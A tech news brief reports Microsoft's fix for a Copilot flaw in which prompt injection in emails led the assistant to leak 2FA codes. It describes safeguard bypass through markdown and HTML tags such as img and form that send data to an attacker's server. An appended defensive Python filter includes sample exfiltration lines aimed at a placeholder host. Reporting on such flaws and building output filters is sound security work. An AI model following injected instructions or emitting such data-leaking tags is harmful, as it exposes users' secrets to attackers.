Brief IA

Copilot: Critical Vulnerability Exposing 2FA Codes Fixed

Code & Dev · Tom Levy

Key Takeaways

1. Microsoft has fixed a critical vulnerability in Copilot that exposed users' 2FA codes to hackers.
2. LLMs, like Copilot, struggle to distinguish between malicious instructions and legitimate requests, posing security risks.
3. Hackers exploit HTML tags to bypass security safeguards and steal sensitive data.

Why it matters: This vulnerability highlights the ongoing security challenges in integrating AI into critical services, potentially impacting millions of users.
Full Analysis

Microsoft Fixes Critical Flaw in Copilot

Last Tuesday, Microsoft rolled out a crucial update to address a vulnerability deemed critical in its artificial intelligence tool, M365 Copilot. This flaw, reported by security researchers to Microsoft, allowed hackers to access 2FA codes as well as other sensitive information contained in emails that Copilot could access. On Monday, the researchers detailed their exploitation method, demonstrating how they were able to extract this sensitive data.

Challenges of Large Language Models

Microsoft, like other companies using LLMs (large language models), faces challenges in preventing its systems from responding to malicious queries. The main issue lies in the inability of AI bots to distinguish legitimate instructions from commands embedded in third-party content. In short, these models can be manipulated into executing actions on behalf of the user without discernment. To address this weakness, Microsoft and its competitors must implement complex and often temporary safeguards to limit the consequences of this intrinsic vulnerability.

Bypassing Safeguards

Copilot, like most LLMs, incorporates safeguards designed to prevent actions such as sending emails or submitting web forms, which could be used to extract user data. However, hackers have found ways to bypass these protections using a markup language that allows formatting elements like headings, lists, or links to be added without HTML tags.

Another technique involves encapsulating sensitive data within HTML tags, such as <img> or <form>. When such a tag results in a web request, the information is sent to the attacker's web server, where it is logged, enabling hackers to capture the secret data.
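One defensive layer against the tag-based leak described above is to filter model output before it is rendered, removing any link, image, or form whose destination is not on an allowlist. The following is an added example, not code from Microsoft or from the researchers; the host names, the allowlist, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the chat UI is allowed to load from or link to.
ALLOWED_HOSTS = {"res.contoso.example"}
# Markdown links/images, and HTML tags whose URL attribute causes a request.
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
HTML_TAG = re.compile(r"<\s*(img|form|a)\b[^>]*>", re.I)
HTML_URL = re.compile(r"\b(?:src|action|href)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", re.I)

# Constructed sample of model output; hosts and the code value are placeholders.
SAMPLE = (
    "Summary of your inbox.\n"
    "![logo](https://res.contoso.example/logo.png)\n"
    "![status](https://collector.invalid/p.png?d=000000)\n"
    '<img src="https://collector.invalid/x?code=000000">\n'
    '<form action="https://collector.invalid/f"><input name="c"></form>\n'
)


def host_allowed(url):
    """True only for absolute http(s) URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url.strip("\"' "))
    except ValueError:
        return False  # unparsable URL: fail closed
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS


def sanitize(model_output):
    """Return (safe_text, findings) with off-allowlist URLs removed before rendering."""
    findings = []

    def md_sub(m):
        bang, label, url = m.groups()
        if host_allowed(url):
            return m.group(0)
        findings.append(("markdown-image" if bang else "markdown-link", url))
        return label  # keep the visible text, drop the URL

    def tag_sub(m):
        bad = [u.strip("\"'") for u in HTML_URL.findall(m.group(0)) if not host_allowed(u)]
        if not bad:
            return m.group(0)
        findings.extend((f"html-{m.group(1).lower()}", u) for u in bad)
        return ""  # drop the whole opening tag

    text = MD_LINK.sub(md_sub, model_output)
    return HTML_TAG.sub(tag_sub, text), findings
```

The findings list is worth logging as a detection signal, since an off-allowlist URL in model output often indicates injected instructions in the content the model read. A regex filter like this one complements, rather than replaces, rendering through a real HTML sanitizer and a restrictive Content-Security-Policy.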
